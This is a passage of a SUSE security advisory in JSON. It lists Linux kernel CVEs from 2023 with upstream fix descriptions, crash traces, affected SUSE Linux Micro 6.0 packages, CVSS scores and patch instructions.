"cve": "CVE-2023-54253",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54253"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: set page extent mapped after read_folio in relocate_one_page\n\nOne of the CI runs triggered the following panic\n\n assertion failed: PagePrivate(page) \u0026\u0026 page-\u003eprivate, in fs/btrfs/subpage.c:229\n ------------[ cut here ]------------\n kernel BUG at fs/btrfs/subpage.c:229!\n Internal error: Oops - BUG: 00000000f2000800 [#1] SMP\n CPU: 0 PID: 923660 Comm: btrfs Not tainted 6.5.0-rc3+ #1\n pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n pc : btrfs_subpage_assert+0xbc/0xf0\n lr : btrfs_subpage_assert+0xbc/0xf0\n sp : ffff800093213720\n x29: ffff800093213720 x28: ffff8000932138b4 x27: 000000000c280000\n x26: 00000001b5d00000 x25: 000000000c281000 x24: 000000000c281fff\n x23: 0000000000001000 x22: 0000000000000000 x21: ffffff42b95bf880\n x20: ffff42b9528e0000 x19: 0000000000001000 x18: ffffffffffffffff\n x17: 667274622f736620 x16: 6e69202c65746176 x15: 0000000000000028\n x14: 0000000000000003 x13: 00000000002672d7 x12: 0000000000000000\n x11: ffffcd3f0ccd9204 x10: ffffcd3f0554ae50 x9 : ffffcd3f0379528c\n x8 : ffff800093213428 x7 : 0000000000000000 x6 : ffffcd3f091771e8\n x5 : ffff42b97f333948 x4 : 0000000000000000 x3 : 0000000000000000\n x2 : 0000000000000000 x1 : ffff42b9556cde80 x0 : 000000000000004f\n Call trace:\n btrfs_subpage_assert+0xbc/0xf0\n btrfs_subpage_set_dirty+0x38/0xa0\n btrfs_page_set_dirty+0x58/0x88\n relocate_one_page+0x204/0x5f0\n relocate_file_extent_cluster+0x11c/0x180\n relocate_data_extent+0xd0/0xf8\n relocate_block_group+0x3d0/0x4e8\n btrfs_relocate_block_group+0x2d8/0x490\n btrfs_relocate_chunk+0x54/0x1a8\n btrfs_balance+0x7f4/0x1150\n btrfs_ioctl+0x10f0/0x20b8\n __arm64_sys_ioctl+0x120/0x11d8\n invoke_syscall.constprop.0+0x80/0xd8\n do_el0_svc+0x6c/0x158\n el0_svc+0x50/0x1b0\n el0t_64_sync_handler+0x120/0x130\n el0t_64_sync+0x194/0x198\n Code: 91098021 b0007fa0 91346000 97e9c6d2 (d4210000)\n\nThis is the same problem outlined in 17b17fcd6d44 (\"btrfs:\nset_page_extent_mapped after read_folio in btrfs_cont_expand\") , and the\nfix is the same. I originally looked for the same pattern elsewhere in\nour code, but mistakenly skipped over this code because I saw the page\ncache readahead before we set_page_extent_mapped, not realizing that\nthis was only in the !page case, that we can still end up with a\n!uptodate page and then do the btrfs_read_folio further down.\n\nThe fix here is the same as the above mentioned patch, move the\nset_page_extent_mapped call to after the btrfs_read_folio() block to\nmake sure that we have the subpage blocksize stuff setup properly before\nusing the page.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54253",
"url": "https://www.suse.com/security/cve/CVE-2023-54253"
},
{
"category": "external",
"summary": "SUSE Bug 1255891 for CVE-2023-54253",
"url": "https://bugzilla.suse.com/1255891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54253"
},
{
"cve": "CVE-2023-54254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Don\u0027t leak a resource on eviction error\n\nOn eviction errors other than -EMULTIHOP we were leaking a resource.\nFix.\n\nv2:\n- Avoid yet another goto (Andi Shyti)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54254",
"url": "https://www.suse.com/security/cve/CVE-2023-54254"
},
{
"category": "external",
"summary": "SUSE Bug 1255890 for CVE-2023-54254",
"url": "https://bugzilla.suse.com/1255890"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54254"
},
{
"cve": "CVE-2023-54255",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54255"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsh: dma: Fix DMA channel offset calculation\n\nVarious SoCs of the SH3, SH4 and SH4A family, which use this driver,\nfeature a differing number of DMA channels, which can be distributed\nbetween up to two DMAC modules. The existing implementation fails to\ncorrectly accommodate for all those variations, resulting in wrong\nchannel offset calculations and leading to kernel panics.\n\nRewrite dma_base_addr() in order to properly calculate channel offsets\nin a DMAC module. Fix dmaor_read_reg() and dmaor_write_reg(), so that\nthe correct DMAC module base is selected for the DMAOR register.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54255",
"url": "https://www.suse.com/security/cve/CVE-2023-54255"
},
{
"category": "external",
"summary": "SUSE Bug 1255884 for CVE-2023-54255",
"url": "https://bugzilla.suse.com/1255884"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54255"
},
{
"cve": "CVE-2023-54258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: fix potential oops in cifs_oplock_break\n\nWith deferred close we can have closes that race with lease breaks,\nand so with the current checks for whether to send the lease response,\noplock_response(), this can mean that an unmount (kill_sb) can occur\njust before we were checking if the tcon-\u003eses is valid. See below:\n\n[Fri Aug 4 04:12:50 2023] RIP: 0010:cifs_oplock_break+0x1f7/0x5b0 [cifs]\n[Fri Aug 4 04:12:50 2023] Code: 7d a8 48 8b 7d c0 c0 e9 02 48 89 45 b8 41 89 cf e8 3e f5 ff ff 4c 89 f7 41 83 e7 01 e8 82 b3 03 f2 49 8b 45 50 48 85 c0 74 5e \u003c48\u003e 83 78 60 00 74 57 45 84 ff 75 52 48 8b 43 98 48 83 eb 68 48 39\n[Fri Aug 4 04:12:50 2023] RSP: 0018:ffffb30607ddbdf8 EFLAGS: 00010206\n[Fri Aug 4 04:12:50 2023] RAX: 632d223d32612022 RBX: ffff97136944b1e0 RCX: 0000000080100009\n[Fri Aug 4 04:12:50 2023] RDX: 0000000000000001 RSI: 0000000080100009 RDI: ffff97136944b188\n[Fri Aug 4 04:12:50 2023] RBP: ffffb30607ddbe58 R08: 0000000000000001 R09: ffffffffc08e0900\n[Fri Aug 4 04:12:50 2023] R10: 0000000000000001 R11: 000000000000000f R12: ffff97136944b138\n[Fri Aug 4 04:12:50 2023] R13: ffff97149147c000 R14: ffff97136944b188 R15: 0000000000000000\n[Fri Aug 4 04:12:50 2023] FS: 0000000000000000(0000) GS:ffff9714f7c00000(0000) knlGS:0000000000000000\n[Fri Aug 4 04:12:50 2023] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[Fri Aug 4 04:12:50 2023] CR2: 00007fd8de9c7590 CR3: 000000011228e000 CR4: 0000000000350ef0\n[Fri Aug 4 04:12:50 2023] Call Trace:\n[Fri Aug 4 04:12:50 2023] \u003cTASK\u003e\n[Fri Aug 4 04:12:50 2023] process_one_work+0x225/0x3d0\n[Fri Aug 4 04:12:50 2023] worker_thread+0x4d/0x3e0\n[Fri Aug 4 04:12:50 2023] ? process_one_work+0x3d0/0x3d0\n[Fri Aug 4 04:12:50 2023] kthread+0x12a/0x150\n[Fri Aug 4 04:12:50 2023] ? set_kthread_struct+0x50/0x50\n[Fri Aug 4 04:12:50 2023] ret_from_fork+0x22/0x30\n[Fri Aug 4 04:12:50 2023] \u003c/TASK\u003e\n\nTo fix this change the ordering of the checks before sending the oplock_response\nto first check if the openFileList is empty.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54258",
"url": "https://www.suse.com/security/cve/CVE-2023-54258"
},
{
"category": "external",
"summary": "SUSE Bug 1255886 for CVE-2023-54258",
"url": "https://bugzilla.suse.com/1255886"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54258"
},
{
"cve": "CVE-2023-54261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdkfd: Add missing gfx11 MQD manager callbacks\n\nmqd_stride function was introduced in commit 2f77b9a242a2\n(\"drm/amdkfd: Update MQD management on multi XCC setup\")\nbut not assigned for gfx11. Fixes a NULL dereference in debugfs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54261",
"url": "https://www.suse.com/security/cve/CVE-2023-54261"
},
{
"category": "external",
"summary": "SUSE Bug 1255879 for CVE-2023-54261",
"url": "https://bugzilla.suse.com/1255879"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54261"
},
{
"cve": "CVE-2023-54263",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54263"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/nouveau/kms/nv50-: init hpd_irq_lock for PIOR DP\n\nFixes OOPS on boards with ANX9805 DP encoders.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54263",
"url": "https://www.suse.com/security/cve/CVE-2023-54263"
},
{
"category": "external",
"summary": "SUSE Bug 1255883 for CVE-2023-54263",
"url": "https://bugzilla.suse.com/1255883"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54263"
},
{
"cve": "CVE-2023-54264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54264"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/sysv: Null check to prevent null-ptr-deref bug\n\nsb_getblk(inode-\u003ei_sb, parent) return a null ptr and taking lock on\nthat leads to the null-ptr-deref bug.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
